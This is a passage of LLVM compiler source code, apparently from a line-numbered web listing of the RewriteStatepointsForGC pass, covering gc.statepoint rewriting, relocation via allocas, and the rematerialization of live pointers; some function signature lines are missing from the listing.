1558  assert(Token && "Should be set in one of the above branches!"); 1559  1560  if (IsDeoptimize) { 1561  // If we're wrapping an @llvm.experimental.deoptimize in a statepoint, we 1562  // transform the tail-call like structure to a call to a void function 1563  // followed by unreachable to get better codegen. 1564  Replacements.push_back( 1565  DeferredReplacement::createDeoptimizeReplacement(Call)); 1566  } else { 1567  Token->setName("statepoint_token"); 1568  if (!Call->getType()->isVoidTy() && !Call->use_empty()) { 1569  StringRef Name = Call->hasName() ? Call->getName() : ""; 1570  CallInst *GCResult = Builder.CreateGCResult(Token, Call->getType(), Name); 1571  GCResult->setAttributes( 1573  Call->getAttributes().getRetAttributes())); 1574  1575  // We cannot RAUW or delete CS.getInstruction() because it could be in the 1576  // live set of some other safepoint, in which case that safepoint's 1577  // PartiallyConstructedSafepointRecord will hold a raw pointer to this 1578  // llvm::Instruction. Instead, we defer the replacement and deletion to 1579  // after the live sets have been made explicit in the IR, and we no longer 1580  // have raw pointers to worry about. 1581  Replacements.emplace_back( 1582  DeferredReplacement::createRAUW(Call, GCResult)); 1583  } else { 1584  Replacements.emplace_back(DeferredReplacement::createDelete(Call)); 1585  } 1586  } 1587  1588  Result.StatepointToken = Token; 1589  1590  // Second, create a gc.relocate for every live variable 1591  const unsigned LiveStartIdx = Statepoint(Token).gcArgsStartIdx(); 1592  CreateGCRelocates(LiveVariables, LiveStartIdx, BasePtrs, Token, Builder); 1593 } 1594  1595 // Replace an existing gc.statepoint with a new one and a set of gc.relocates 1596 // which make the relocations happening at this safepoint explicit. 1597 // 1598 // WARNING: Does not do any fixup to adjust users of the original live 1599 // values. That's the callers responsibility. 1600 static void 1602  PartiallyConstructedSafepointRecord &Result, 1603  std::vector<DeferredReplacement> &Replacements) { 1604  const auto &LiveSet = Result.LiveSet; 1605  const auto &PointerToBase = Result.PointerToBase; 1606  1607  // Convert to vector for efficient cross referencing. 1608  SmallVector<Value *, 64> BaseVec, LiveVec; 1609  LiveVec.reserve(LiveSet.size()); 1610  BaseVec.reserve(LiveSet.size()); 1611  for (Value *L : LiveSet) { 1612  LiveVec.push_back(L); 1613  assert(PointerToBase.count(L)); 1614  Value *Base = PointerToBase.find(L)->second; 1615  BaseVec.push_back(Base); 1616  } 1617  assert(LiveVec.size() == BaseVec.size()); 1618  1619  // Do the actual rewriting and delete the old statepoint 1620  makeStatepointExplicitImpl(Call, BaseVec, LiveVec, Result, Replacements); 1621 } 1622  1623 // Helper function for the relocationViaAlloca. 1624 // 1625 // It receives iterator to the statepoint gc relocates and emits a store to the 1626 // assigned location (via allocaMap) for the each one of them. It adds the 1627 // visited values into the visitedLiveValues set, which we will later use them 1628 // for sanity checking. 1629 static void 1632  DenseSet<Value *> &VisitedLiveValues) { 1633  for (User *U : GCRelocs) { 1634  GCRelocateInst *Relocate = dyn_cast<GCRelocateInst>(U); 1635  if (!Relocate) 1636  continue; 1637  1638  Value *OriginalValue = Relocate->getDerivedPtr(); 1639  assert(AllocaMap.count(OriginalValue)); 1640  Value *Alloca = AllocaMap[OriginalValue]; 1641  1642  // Emit store into the related alloca 1643  // All gc_relocates are i8 addrspace(1)* typed, and it must be bitcasted to 1644  // the correct type according to alloca. 1645  assert(Relocate->getNextNode() && 1646  "Should always have one since it's not a terminator"); 1647  IRBuilder<> Builder(Relocate->getNextNode()); 1648  Value *CastedRelocatedValue = 1649  Builder.CreateBitCast(Relocate, 1650  cast<AllocaInst>(Alloca)->getAllocatedType(), 1651  suffixed_name_or(Relocate, ".casted", "")); 1652  1653  StoreInst *Store = new StoreInst(CastedRelocatedValue, Alloca); 1654  Store->insertAfter(cast<Instruction>(CastedRelocatedValue)); 1655  1656 #ifndef NDEBUG 1657  VisitedLiveValues.insert(OriginalValue); 1658 #endif 1659  } 1660 } 1661  1662 // Helper function for the "relocationViaAlloca". Similar to the 1663 // "insertRelocationStores" but works for rematerialized values. 1665  const RematerializedValueMapTy &RematerializedValues, 1667  DenseSet<Value *> &VisitedLiveValues) { 1668  for (auto RematerializedValuePair: RematerializedValues) { 1669  Instruction *RematerializedValue = RematerializedValuePair.first; 1670  Value *OriginalValue = RematerializedValuePair.second; 1671  1672  assert(AllocaMap.count(OriginalValue) && 1673  "Can not find alloca for rematerialized value"); 1674  Value *Alloca = AllocaMap[OriginalValue]; 1675  1676  StoreInst *Store = new StoreInst(RematerializedValue, Alloca); 1677  Store->insertAfter(RematerializedValue); 1678  1679 #ifndef NDEBUG 1680  VisitedLiveValues.insert(OriginalValue); 1681 #endif 1682  } 1683 } 1684  1685 /// Do all the relocation update via allocas and mem2reg 1689 #ifndef NDEBUG 1690  // record initial number of (static) allocas; we'll check we have the same 1691  // number when we get done. 1692  int InitialAllocaNum = 0; 1693  for (Instruction &I : F.getEntryBlock()) 1694  if (isa<AllocaInst>(I)) 1695  InitialAllocaNum++; 1696 #endif 1697  1698  // TODO-PERF: change data structures, reserve 1700  SmallVector<AllocaInst *, 200> PromotableAllocas; 1701  // Used later to chack that we have enough allocas to store all values 1702  std::size_t NumRematerializedValues = 0; 1703  PromotableAllocas.reserve(Live.size()); 1704  1705  // Emit alloca for "LiveValue" and record it in "allocaMap" and 1706  // "PromotableAllocas" 1707  const DataLayout &DL = F.getParent()->getDataLayout(); 1708  auto emitAllocaFor = [&](Value *LiveValue) { 1709  AllocaInst *Alloca = new AllocaInst(LiveValue->getType(), 1710  DL.getAllocaAddrSpace(), "", 1712  AllocaMap[LiveValue] = Alloca; 1713  PromotableAllocas.push_back(Alloca); 1714  }; 1715  1716  // Emit alloca for each live gc pointer 1717  for (Value *V : Live) 1718  emitAllocaFor(V); 1719  1720  // Emit allocas for rematerialized values 1721  for (const auto &Info : Records) 1722  for (auto RematerializedValuePair : Info.RematerializedValues) { 1723  Value *OriginalValue = RematerializedValuePair.second; 1724  if (AllocaMap.count(OriginalValue) != 0) 1725  continue; 1726  1727  emitAllocaFor(OriginalValue); 1728  ++NumRematerializedValues; 1729  } 1730  1731  // The next two loops are part of the same conceptual operation. We need to 1732  // insert a store to the alloca after the original def and at each 1733  // redefinition. We need to insert a load before each use. These are split 1734  // into distinct loops for performance reasons. 1735  1736  // Update gc pointer after each statepoint: either store a relocated value or 1737  // null (if no relocated value was found for this gc pointer and it is not a 1738  // gc_result). This must happen before we update the statepoint with load of 1739  // alloca otherwise we lose the link between statepoint and old def. 1740  for (const auto &Info : Records) { 1741  Value *Statepoint = Info.StatepointToken; 1742  1743  // This will be used for consistency check 1744  DenseSet<Value *> VisitedLiveValues; 1745  1746  // Insert stores for normal statepoint gc relocates 1747  insertRelocationStores(Statepoint->users(), AllocaMap, VisitedLiveValues); 1748  1749  // In case if it was invoke statepoint 1750  // we will insert stores for exceptional path gc relocates. 1751  if (isa<InvokeInst>(Statepoint)) { 1752  insertRelocationStores(Info.UnwindToken->users(), AllocaMap, 1753  VisitedLiveValues); 1754  } 1755  1756  // Do similar thing with rematerialized values 1757  insertRematerializationStores(Info.RematerializedValues, AllocaMap, 1758  VisitedLiveValues); 1759  1760  if (ClobberNonLive) { 1761  // As a debugging aid, pretend that an unrelocated pointer becomes null at 1762  // the gc.statepoint. This will turn some subtle GC problems into 1763  // slightly easier to debug SEGVs. Note that on large IR files with 1764  // lots of gc.statepoints this is extremely costly both memory and time 1765  // wise. 1767  for (auto Pair : AllocaMap) { 1768  Value *Def = Pair.first; 1769  AllocaInst *Alloca = Pair.second; 1770  1771  // This value was relocated 1772  if (VisitedLiveValues.count(Def)) { 1773  continue; 1774  } 1775  ToClobber.push_back(Alloca); 1776  } 1777  1778  auto InsertClobbersAt = [&](Instruction *IP) { 1779  for (auto *AI : ToClobber) { 1780  auto PT = cast<PointerType>(AI->getAllocatedType()); 1782  StoreInst *Store = new StoreInst(CPN, AI); 1783  Store->insertBefore(IP); 1784  } 1785  }; 1786  1787  // Insert the clobbering stores. These may get intermixed with the 1788  // gc.results and gc.relocates, but that's fine. 1789  if (auto II = dyn_cast<InvokeInst>(Statepoint)) { 1790  InsertClobbersAt(&*II->getNormalDest()->getFirstInsertionPt()); 1791  InsertClobbersAt(&*II->getUnwindDest()->getFirstInsertionPt()); 1792  } else { 1793  InsertClobbersAt(cast<Instruction>(Statepoint)->getNextNode()); 1794  } 1795  } 1796  } 1797  1798  // Update use with load allocas and add store for gc_relocated. 1799  for (auto Pair : AllocaMap) { 1800  Value *Def = Pair.first; 1801  AllocaInst *Alloca = Pair.second; 1802  1803  // We pre-record the uses of allocas so that we dont have to worry about 1804  // later update that changes the user information.. 1805  1807  // PERF: trade a linear scan for repeated reallocation 1808  Uses.reserve(Def->getNumUses()); 1809  for (User *U : Def->users()) { 1810  if (!isa<ConstantExpr>(U)) { 1811  // If the def has a ConstantExpr use, then the def is either a 1812  // ConstantExpr use itself or null. In either case 1813  // (recursively in the first, directly in the second), the oop 1814  // it is ultimately dependent on is null and this particular 1815  // use does not need to be fixed up. 1816  Uses.push_back(cast<Instruction>(U)); 1817  } 1818  } 1819  1820  llvm::sort(Uses); 1821  auto Last = std::unique(Uses.begin(), Uses.end()); 1822  Uses.erase(Last, Uses.end()); 1823  1824  for (Instruction *Use : Uses) { 1825  if (isa<PHINode>(Use)) { 1826  PHINode *Phi = cast<PHINode>(Use); 1827  for (unsigned i = 0; i < Phi->getNumIncomingValues(); i++) { 1828  if (Def == Phi->getIncomingValue(i)) { 1829  LoadInst *Load = 1830  new LoadInst(Alloca->getAllocatedType(), Alloca, "", 1831  Phi->getIncomingBlock(i)->getTerminator()); 1832  Phi->setIncomingValue(i, Load); 1833  } 1834  } 1835  } else { 1836  LoadInst *Load = 1837  new LoadInst(Alloca->getAllocatedType(), Alloca, "", Use); 1838  Use->replaceUsesOfWith(Def, Load); 1839  } 1840  } 1841  1842  // Emit store for the initial gc value. Store must be inserted after load, 1843  // otherwise store will be in alloca's use list and an extra load will be 1844  // inserted before it. 1845  StoreInst *Store = new StoreInst(Def, Alloca); 1846  if (Instruction *Inst = dyn_cast<Instruction>(Def)) { 1847  if (InvokeInst *Invoke = dyn_cast<InvokeInst>(Inst)) { 1848  // InvokeInst is a terminator so the store need to be inserted into its 1849  // normal destination block. 1850  BasicBlock *NormalDest = Invoke->getNormalDest(); 1851  Store->insertBefore(NormalDest->getFirstNonPHI()); 1852  } else { 1853  assert(!Inst->isTerminator() && 1854  "The only terminator that can produce a value is " 1855  "InvokeInst which is handled above."); 1856  Store->insertAfter(Inst); 1857  } 1858  } else { 1859  assert(isa<Argument>(Def)); 1860  Store->insertAfter(cast<Instruction>(Alloca)); 1861  } 1862  } 1863  1864  assert(PromotableAllocas.size() == Live.size() + NumRematerializedValues && 1865  "we must have the same allocas with lives"); 1866  if (!PromotableAllocas.empty()) { 1867  // Apply mem2reg to promote alloca to SSA 1868  PromoteMemToReg(PromotableAllocas, DT); 1869  } 1870  1871 #ifndef NDEBUG 1872  for (auto &I : F.getEntryBlock()) 1873  if (isa<AllocaInst>(I)) 1874  InitialAllocaNum--; 1875  assert(InitialAllocaNum == 0 && "We must not introduce any extra allocas"); 1876 #endif 1877 } 1878  1879 /// Implement a unique function which doesn't require we sort the input 1880 /// vector. Doing so has the effect of changing the output of a couple of 1881 /// tests in ways which make them less useful in testing fused safepoints. 1882 template <typename T> static void unique_unsorted(SmallVectorImpl<T> &Vec) { 1883  SmallSet<T, 8> Seen; 1884  Vec.erase(remove_if(Vec, [&](const T &V) { return !Seen.insert(V).second; }), 1885  Vec.end()); 1886 } 1887  1888 /// Insert holders so that each Value is obviously live through the entire 1889 /// lifetime of the call. 1890 static void insertUseHolderAfter(CallBase *Call, const ArrayRef<Value *> Values, 1891  SmallVectorImpl<CallInst *> &Holders) { 1892  if (Values.empty()) 1893  // No values to hold live, might as well not insert the empty holder 1894  return; 1895  1896  Module *M = Call->getModule(); 1897  // Use a dummy vararg function to actually hold the values live 1899  "__tmp_use", FunctionType::get(Type::getVoidTy(M->getContext()), true)); 1900  if (isa<CallInst>(Call)) { 1901  // For call safepoints insert dummy calls right after safepoint 1902  Holders.push_back( 1903  CallInst::Create(Func, Values, "", &*++Call->getIterator())); 1904  return; 1905  } 1906  // For invoke safepooints insert dummy calls both in normal and 1907  // exceptional destination blocks 1908  auto *II = cast<InvokeInst>(Call); 1909  Holders.push_back(CallInst::Create( 1910  Func, Values, "", &*II->getNormalDest()->getFirstInsertionPt())); 1911  Holders.push_back(CallInst::Create( 1912  Func, Values, "", &*II->getUnwindDest()->getFirstInsertionPt())); 1913 } 1914  1916  Function &F, DominatorTree &DT, ArrayRef<CallBase *> toUpdate, 1918  GCPtrLivenessData OriginalLivenessData; 1919  computeLiveInValues(DT, F, OriginalLivenessData); 1920  for (size_t i = 0; i < records.size(); i++) { 1921  struct PartiallyConstructedSafepointRecord &info = records[i]; 1922  analyzeParsePointLiveness(DT, OriginalLivenessData, toUpdate[i], info); 1923  } 1924 } 1925  1926 // Helper function for the "rematerializeLiveValues". It walks use chain 1927 // starting from the "CurrentValue" until it reaches the root of the chain, i.e. 1928 // the base or a value it cannot process. Only "simple" values are processed 1929 // (currently it is GEP's and casts). The returned root is examined by the 1930 // callers of findRematerializableChainToBasePointer. Fills "ChainToBase" array 1931 // with all visited values. 1933  SmallVectorImpl<Instruction*> &ChainToBase, 1934  Value *CurrentValue) { 1935  if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(CurrentValue)) { 1936  ChainToBase.push_back(GEP); 1937  return findRematerializableChainToBasePointer(ChainToBase, 1938  GEP->getPointerOperand()); 1939  } 1940  1941  if (CastInst *CI = dyn_cast<CastInst>(CurrentValue)) { 1942  if (!CI->isNoopCast(CI->getModule()->getDataLayout())) 1943  return CI; 1944  1945  ChainToBase.push_back(CI); 1946  return findRematerializableChainToBasePointer(ChainToBase, 1947  CI->getOperand(0)); 1948  } 1949  1950  // We have reached the root of the chain, which is either equal to the base or 1951  // is the first unsupported value along the use chain. 1952  return CurrentValue; 1953 } 1954  1955 // Helper function for the "rematerializeLiveValues". Compute cost of the use 1956 // chain we are going to rematerialize. 1957 static unsigned 1959  TargetTransformInfo &TTI) { 1960  unsigned Cost = 0; 1961  1962  for (Instruction *Instr : Chain) { 1963  if (CastInst *CI = dyn_cast<CastInst>(Instr)) { 1964  assert(CI->isNoopCast(CI->getModule()->getDataLayout()) && 1965  "non noop cast is found during rematerialization"); 1966  1967  Type *SrcTy = CI->getOperand(0)->getType(); 1968  Cost += TTI.getCastInstrCost(CI->getOpcode(), CI->getType(), SrcTy, CI); 1969  1970  } else if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(Instr)) { 1971  // Cost of the address calculation 1972  Type *ValTy = GEP->getSourceElementType(); 1973  Cost += TTI.getAddressComputationCost(ValTy); 1974  1975  // And cost of the GEP itself 1976  // TODO: Use TTI->getGEPCost here (it exists, but appears to be not 1977  // allowed for the external usage) 1978  if (!GEP->hasAllConstantIndices()) 1979  Cost += 2; 1980  1981  } else { 1982  llvm_unreachable("unsupported instruction type during rematerialization"); 1983  } 1984  } 1985  1986  return Cost; 1987 } 1988  1989 static bool AreEquivalentPhiNodes(PHINode &OrigRootPhi, PHINode &AlternateRootPhi) { 1990  unsigned PhiNum = OrigRootPhi.getNumIncomingValues(); 1991  if (PhiNum != AlternateRootPhi.getNumIncomingValues() || 1992  OrigRootPhi.getParent() != AlternateRootPhi.getParent()) 1993  return false; 1994  // Map of incoming values and their corresponding basic blocks of 1995  // OrigRootPhi. 1996  SmallDenseMap<Value *, BasicBlock *, 8> CurrentIncomingValues; 1997  for (unsigned i = 0; i < PhiNum; i++) 1998  CurrentIncomingValues[OrigRootPhi.getIncomingValue(i)] = 1999  OrigRootPhi.getIncomingBlock(i); 2000  2001  // Both current and base PHIs should have same incoming values and 2002  // the same basic blocks corresponding to the incoming values. 2003  for (unsigned i = 0; i < PhiNum; i++) { 2004  auto CIVI = 2005  CurrentIncomingValues.find(AlternateRootPhi.getIncomingValue(i)); 2006  if (CIVI == CurrentIncomingValues.end()) 2007  return false; 2008  BasicBlock *CurrentIncomingBB = CIVI->second; 2009  if (CurrentIncomingBB != AlternateRootPhi.getIncomingBlock(i)) 2010  return false; 2011  } 2012  return true; 2013 } 2014  2015 // From the statepoint live set pick values that are cheaper to recompute then 2016 // to relocate. Remove this values from the live set, rematerialize them after 2017 // statepoint and record them in "Info" structure. Note that similar to 2018 // relocated values we don't do any user adjustments here. 2020  PartiallyConstructedSafepointRecord &Info, 2021  TargetTransformInfo &TTI) { 2022  const unsigned int ChainLengthThreshold = 10; 2023  2024  // Record values we are going to delete from this statepoint live set. 2025  // We can not di this in following loop due to iterator invalidation. 2026  SmallVector<Value *, 32> LiveValuesToBeDeleted; 2027  2028  for (Value *LiveValue: Info.LiveSet) { 2029  // For each live pointer find its defining chain 2030  SmallVector<Instruction *, 3> ChainToBase; 2031  assert(Info.PointerToBase.count(LiveValue)); 2032  Value *RootOfChain = 2034  LiveValue); 2035  2036  // Nothing to do, or chain is too long 2037  if ( ChainToBase.size() == 0 || 2038  ChainToBase.size() > ChainLengthThreshold) 2039  continue; 2040  2041  // Handle the scenario where the RootOfChain is not equal to the 2042  // Base Value, but they are essentially the same phi values. 2043  if (RootOfChain != Info.PointerToBase[LiveValue]) { 2044  PHINode *OrigRootPhi = dyn_cast<PHINode>(RootOfChain); 2045  PHINode *AlternateRootPhi = dyn_cast<PHINode>(Info.PointerToBase[LiveValue]); 2046  if (!OrigRootPhi || !AlternateRootPhi) 2047  continue; 2048  // PHI nodes that have the same incoming values, and belonging to the same 2049  // basic blocks are essentially the same SSA value. When the original phi 2050  // has incoming values with different base pointers, the original phi is 2051  // marked as conflict, and an additional `AlternateRootPhi` with the same 2052  // incoming values get generated by the findBasePointer function. We need 2053  // to identify the newly generated AlternateRootPhi (.base version of phi) 2054  // and RootOfChain (the original phi node itself) are the same, so that we 2055  // can rematerialize the gep and casts. This is a workaround for the 2056  // deficiency in the findBasePointer algorithm. 2057  if (!AreEquivalentPhiNodes(*OrigRootPhi, *AlternateRootPhi)) 2058  continue; 2059  // Now that the phi nodes are proved to be the same, assert that 2060  // findBasePointer's newly generated AlternateRootPhi is present in the 2061  // liveset of the call. 2062  assert(Info.LiveSet.count(AlternateRootPhi)); 2063  } 2064  // Compute cost of this chain 2065  unsigned Cost = chainToBasePointerCost(ChainToBase, TTI); 2066  // TODO: We can also account for cases when we will be able to remove some 2067  // of the rematerialized values by later optimization passes. I.e if 2068  // we rematerialized several intersecting chains. Or if original values 2069  // don't have any uses besides this statepoint. 2070  2071  // For invokes we need to rematerialize each chain twice - for normal and 2072  // for unwind basic blocks. Model this by multiplying cost by two. 2073  if (isa<InvokeInst>(Call)) { 2074  Cost *= 2; 2075  } 2076  // If it's too expensive - skip it 2077  if (Cost >= RematerializationThreshold) 2078  continue; 2079  2080  // Remove value from the live set 2081  LiveValuesToBeDeleted.push_back(LiveValue); 2082  2083  // Clone instructions and record them inside "Info" structure 2084  2085  // Walk backwards to visit top-most instructions first 2086  std::reverse(ChainToBase.begin(), ChainToBase.end()); 2087  2088  // Utility function which clones all instructions from "ChainToBase" 2089  // and inserts them before "InsertBefore". Returns rematerialized value 2090  // which should be used after statepoint. 2091  auto rematerializeChain = [&ChainToBase]( 2092  Instruction *InsertBefore, Value *RootOfChain, Value *AlternateLiveBase) { 2093  Instruction *LastClonedValue = nullptr; 2094  Instruction *LastValue = nullptr; 2095  for (Instruction *Instr: ChainToBase) { 2096  // Only GEP's and casts are supported as we need to be careful to not 2097  // introduce any new uses of pointers not in the liveset. 2098  // Note that it's fine to introduce new uses of pointers which were 2099  // otherwise not used after this statepoint. 2100  assert(isa<GetElementPtrInst>(Instr) || isa<CastInst>(Instr)); 2101  2102  Instruction *ClonedValue = Instr->clone(); 2103  ClonedValue->insertBefore(InsertBefore); 2104  ClonedValue->setName(Instr->getName() + ".remat"); 2105  2106  // If it is not first instruction in the chain then it uses previously 2107  // cloned value. We should update it to use cloned value. 2108  if (LastClonedValue) { 2109  assert(LastValue); 2110  ClonedValue->replaceUsesOfWith(LastValue, LastClonedValue); 2111 #ifndef NDEBUG 2112  for (auto OpValue : ClonedValue->operand_values()) { 2113  // Assert that cloned instruction does not use any instructions from 2114  // this chain other than LastClonedValue 2115  assert(!is_contained(ChainToBase, OpValue) && 2116  "incorrect use in rematerialization chain"); 2117  // Assert that the cloned instruction does not use the RootOfChain 2118  // or the AlternateLiveBase. 2119  assert(OpValue != RootOfChain && OpValue != AlternateLiveBase); 2120  } 2121 #endif 2122  } else { 2123  // For the first instruction, replace the use of unrelocated base i.e. 2124  // RootOfChain/OrigRootPhi, with the corresponding PHI present in the 2125  // live set. They have been proved to be the same PHI nodes. Note 2126  // that the *only* use of the RootOfChain in the ChainToBase list is 2127  // the first Value in the list. 2128  if (RootOfChain != AlternateLiveBase) 2129  ClonedValue->replaceUsesOfWith(RootOfChain, AlternateLiveBase); 2130  } 2131  2132  LastClonedValue = ClonedValue; 2133  LastValue = Instr; 2134  } 2135  assert(LastClonedValue); 2136  return LastClonedValue; 2137  }; 2138  2139  // Different cases for calls and invokes. For invokes we need to clone 2140  // instructions both on normal and unwind path. 2141  if (isa<CallInst>(Call)) { 2142  Instruction *InsertBefore = Call->getNextNode(); 2143  assert(InsertBefore); 2144  Instruction *RematerializedValue = rematerializeChain( 2145  InsertBefore, RootOfChain, Info.PointerToBase[LiveValue]); 2146  Info.RematerializedValues[RematerializedValue] = LiveValue; 2147  } else { 2148  auto *Invoke = cast<InvokeInst>(Call); 2149  2150  Instruction *NormalInsertBefore = 2151  &*Invoke->getNormalDest()->getFirstInsertionPt(); 2152  Instruction *UnwindInsertBefore = 2153  &*Invoke->getUnwindDest()->getFirstInsertionPt(); 2154  2155  Instruction *NormalRematerializedValue = rematerializeChain( 2156  NormalInsertBefore, RootOfChain, Info.PointerToBase[LiveValue]); 2157  Instruction *UnwindRematerializedValue = rematerializeChain( 2158  UnwindInsertBefore, RootOfChain, Info.PointerToBase[LiveValue]); 2159  2160  Info.RematerializedValues[NormalRematerializedValue] = LiveValue; 2161  Info.RematerializedValues[UnwindRematerializedValue] = LiveValue; 2162  } 2163  } 2164  2165  // Remove rematerializaed values from the live set 2166  for (auto LiveValue: LiveValuesToBeDeleted) { 2167  Info.LiveSet.remove(LiveValue); 2168  } 2169 } 2170  2172  TargetTransformInfo &TTI, 2173  SmallVectorImpl<CallBase *> &ToUpdate) { 2174 #ifndef NDEBUG 2175  // sanity check the input 2176  std::set<CallBase *> Uniqued; 2177  Uniqued.insert(ToUpdate.begin(), ToUpdate.end()); 2178  assert(Uniqued.size() == ToUpdate.size() && "no duplicates please!"); 2179  2180  for (CallBase *Call : ToUpdate) 2181  assert(Call->getFunction() == &F); 2182 #endif 2183  2184  // When inserting gc.relocates for invokes, we need to be able to insert at 2185  // the top of the successor blocks. See the comment on 2186  // normalForInvokeSafepoint on exactly what is needed. Note that this step 2187  // may restructure the CFG. 2188  for (CallBase *Call : ToUpdate) { 2189  auto *II = dyn_cast<InvokeInst>(Call); 2190  if (!II) 2191  continue; 2192  normalizeForInvokeSafepoint(II->getNormalDest(), II->getParent(), DT); 2193  normalizeForInvokeSafepoint(II->getUnwindDest(), II->getParent(), DT); 2194  } 2195  2196  // A list of dummy calls added to the IR to keep various values obviously 2197  // live in the IR. We'll remove all of these when done. 2199  2200  // Insert a dummy call with all of the deopt operands we'll need for the 2201  // actual safepoint insertion as arguments. This ensures reference operands 2202  // in the deopt argument list are considered live through the safepoint (and 2203  // thus makes sure they get relocated.) 2204  for (CallBase *Call : ToUpdate) { 2205  SmallVector<Value *, 64> DeoptValues; 2206  2207  for (Value *Arg : GetDeoptBundleOperands(Call)) { 2208  assert(!isUnhandledGCPointerType(Arg->getType()) && 2209  "support for FCA unimplemented"); 2210  if (isHandledGCPointerType(Arg->getType())) 2211  DeoptValues.push_back(Arg); 2212  } 2213  2214  insertUseHolderAfter(Call, DeoptValues, Holders); 2215  } 2216  2218  2219  // A) Identify all gc pointers which are statically live at the given call 2220  // site. 2221  findLiveReferences(F, DT, ToUpdate, Records); 2222  2223  // B) Find the base pointers for each live pointer 2224  /* scope for caching */ { 2225  // Cache the 'defining value' relation used in the computation and 2226  // insertion of base phis and selects. This ensures that we don't insert 2227  // large numbers of duplicate base_phis. 2228  DefiningValueMapTy DVCache; 2229  2230  for (size_t i = 0; i < Records.size(); i++) { 2231  PartiallyConstructedSafepointRecord &info = Records[i]; 2232  findBasePointers(DT, DVCache, ToUpdate[i], info); 2233  } 2234  } // end of cache scope 2235  2236  // The base phi insertion logic (for any safepoint) may have inserted new 2237  // instructions which are now live at some safepoint. The simplest such 2238  // example is: 2239  // loop: 2240  // phi a <-- will be a new base_phi here 2241  // safepoint 1 <-- that needs to be live here 2242  // gep a + 1 2243  // safepoint 2 2244  // br loop 2245  // We insert some dummy calls after each safepoint to definitely hold live 2246  // the base pointers which were identified for that safepoint. We'll then 2247  // ask liveness for _every_ base inserted to see what is now live. Then we 2248  // remove the dummy calls. 2249  Holders.reserve(Holders.size() + Records.size()); 2250  for (size_t i = 0; i < Records.size(); i++) { 2251  PartiallyConstructedSafepointRecord &Info = Records[i]; 2252  2254  for (auto Pair : Info.PointerToBase) 2255  Bases.push_back(Pair.second); 2256  2257  insertUseHolderAfter(ToUpdate[i], Bases, Holders); 2258  } 2259  2260  // By selecting base pointers, we've effectively inserted new uses. Thus, we 2261  // need to rerun liveness. We may *also* have inserted new defs, but that's 2262  // not the key issue. 2263  recomputeLiveInValues(F, DT, ToUpdate, Records); 2264  2265  if (PrintBasePointers) { 2266  for (auto &Info : Records) { 2267  errs() << "Base Pairs: (w/Relocation)\n"; 2268  for (auto Pair : Info.PointerToBase) { 2269  errs() << " derived "; 2270  Pair.first->printAsOperand(errs(), false); 2271  errs() << " base "; 2272  Pair.second->printAsOperand(errs(), false); 2273  errs() << "\n"; 2274  } 2275  } 2276  } 2277  2278  // It is possible that non-constant live variables have a constant base. For 2279  // example, a GEP with a variable offset from a global. In this case we can 2280  // remove it from the liveset. We already don't add constants to the liveset 2281  // because we assume they won't move at runtime and the GC doesn't need to be 2282  // informed about them. The same reasoning applies if the base is constant. 2283  // Note that the relocation placement code relies on this filtering for 2284  // correctness as it expects the base to be in the liveset, which isn't true 2285  // if the base is constant. 2286  for (auto &Info : Records) 2287  for (auto &BasePair : Info.PointerToBase) 2288  if (isa<Constant>(BasePair.second)) 2289  Info.LiveSet.remove(BasePair.first); 2290  2291  for (CallInst *CI : Holders) 2292  CI->eraseFromParent(); 2293  2294  Holders.clear(); 2295  2296  // In order to reduce live set of statepoint we might choose to rematerialize 2297  // some values instead of relocating them. This is purely an optimization and 2298  // does not influence correctness. 2299  for (size_t i = 0; i < Records.size(); i++) 2300  rematerializeLiveValues(ToUpdate[i], Records[i], TTI); 2301  2302  // We need this to safely RAUW and delete call or invoke return values that 2303  // may themselves be live over a statepoint. For details, please see usage in 2304  // makeStatepointExplicitImpl. 2305  std::vector<DeferredReplacement> Replacements; 2306  2307  // Now run through and replace the existing statepoints with new ones with 2308  // the live variables listed. We do not yet update uses of the values being 2309  // relocated. We have references to live variables that need to 2310  // survive to the last iteration of this loop. (By construction, the 2311  // previous statepoint can not be a live variable, thus we can and remove 2312  // the old statepoint calls as we go.) 2313  for (size_t i = 0; i < Records.size(); i++) 2314  makeStatepointExplicit(DT, ToUpdate[i], Records[i], Replacements); 2315  2316  ToUpdate.clear(); // prevent accident use of invalid calls. 2317  2318  for (auto &PR : Replacements) 2319  PR.doReplacement(); 2320  2321  Replacements.clear(); 2322  2323  for (auto &Info : Records) { 2324  // These live sets may contain state Value pointers, since we replaced calls 2325  // with operand bundles with calls wrapped in gc.statepoint, and some of 2326  // those calls may have been def'ing live gc pointers. Clear these out to 2327  // avoid accidentally using them. 2328  // 2329  // TODO: We should create a separate data structure that does not contain 2330  // these live sets, and migrate to using that data structure from this point 2331  // onward. 2332  Info.LiveSet.clear(); 2333  Info.PointerToBase.clear(); 2334  } 2335  2336  // Do all the fixups of the original live variables to their relocated selves 2338  for (size_t i = 0; i < Records.size(); i++) { 2339  PartiallyConstructedSafepointRecord &Info = Records[i]; 2340  2341  // We can't simply save the live set from the original insertion. One of 2342  // the live values might be the result of a call which needs a safepoint. 2343  // That Value* no longer exists and we need to use the new gc_result. 2344  // Thankfully, the live set is embedded in the statepoint (and updated), so 2345  // we just grab that. 2346  Statepoint Statepoint(Info.StatepointToken); 2347  Live.insert(Live.end(), Statepoint.gc_args_begin(), 2348  Statepoint.gc_args_end()); 2349 #ifndef NDEBUG 2350  // Do some basic sanity checks on our liveness results before performing 2351  // relocation. Relocation can and will turn mistakes in liveness results 2352  // into non-sensical code which is must harder to debug. 2353  // TODO: It would be nice to test consistency as well 2354  assert(DT.isReachableFromEntry(Info.StatepointToken->getParent()) && 2355  "statepoint must be reachable or liveness is meaningless"); 2356  for (Value *V : Statepoint.gc_args()) { 2357  if (!isa<Instruction>(V)) 2358  // Non-instruction values trivial dominate all possible uses 2359  continue; 2360  auto *LiveInst = cast<Instruction>(V); 2361  assert(DT.isReachableFromEntry(LiveInst->getParent()) && 2362  "unreachable values should never be live"); 2363  assert(DT.dominates(LiveInst, Info.StatepointToken) && 2364  "basic SSA liveness expectation violated by liveness analysis"); 2365  } 2366 #endif 2367  } 2368  unique_unsorted(Live); 2369  2370 #ifndef NDEBUG 2371  // sanity check 2372  for (auto *Ptr : Live) 2373  assert(isHandledGCPointerType(Ptr->getType()) && 2374  "must be a gc pointer type"); 2375 #endif 2376  2377  relocationViaAlloca(F, DT, Live, Records); 2378  return !Records.empty(); 2379 } 2380  2381 // Handles both return values and arguments for Functions and calls. 2382 template <typename AttrHolder> 2383 static void RemoveNonValidAttrAtIndex(LLVMContext &Ctx, AttrHolder &AH, 2384 